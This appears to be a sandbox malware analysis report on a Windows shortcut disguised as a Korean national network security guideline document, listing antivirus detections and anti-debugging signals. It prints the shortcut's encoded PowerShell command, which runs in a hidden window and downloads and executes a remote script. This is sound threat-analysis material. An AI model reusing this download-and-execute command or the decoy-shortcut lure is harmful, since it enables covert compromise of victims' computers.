file	C:\Users\test22\AppData\Local\Temp\국가 망 보안체계 가이드라인(요약).lnk

Creates a suspicious process (1 event)

cmdline

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -e LgAvACoALgBwAGQAZgA7AEkARQBYACgASQBXAFIAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUAMAAuADEAMAAwAC8AdAAuAHcAbwBmAGYAMgAnAC0AVQBzAGUAQgBhAHMAaQBjAFAAKQA= -w hIdDeN

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 19, 2025, 3:18 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Lionic	Trojan.WinLNK.Boxter.4!c
CTX	lnk.trojan.generic
Skyhigh	BehavesLike.Dropper.vb
VIPRE	Heur.BZC.YAX.Boxter.32.2E92F519
Arcabit	Heur.BZC.YAX.Boxter.32.2E92F519
Symantec	CL.Downloader!gen12
Kaspersky	HEUR:Trojan.WinLNK.Powecod.a
BitDefender	Heur.BZC.YAX.Boxter.32.2E92F519
MicroWorld-eScan	Heur.BZC.YAX.Boxter.32.2E92F519
Emsisoft	Trojan.PowerShell.Gen (A)
Sophos	Mal/DownLnk-D
SentinelOne	Static AI - Suspicious LNK
FireEye	Heur.BZC.YAX.Boxter.32.2E92F519
Google	Detected
GData	Heur.BZC.YAX.Boxter.32.2E92F519
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript
huorong	TrojanDownloader/LNK.Agent.bc
alibabacloud	Trojan:Win/Powecod.a

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3024 resumed a thread in remote process 2196
NtResumeThread Feb. 19, 2025, 3:18 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2196	1	0	0

Creates a suspicious Powershell process (1 event)

option

-w hidden

value

Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

국가 망 보안체계 가이드라인(요약).lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All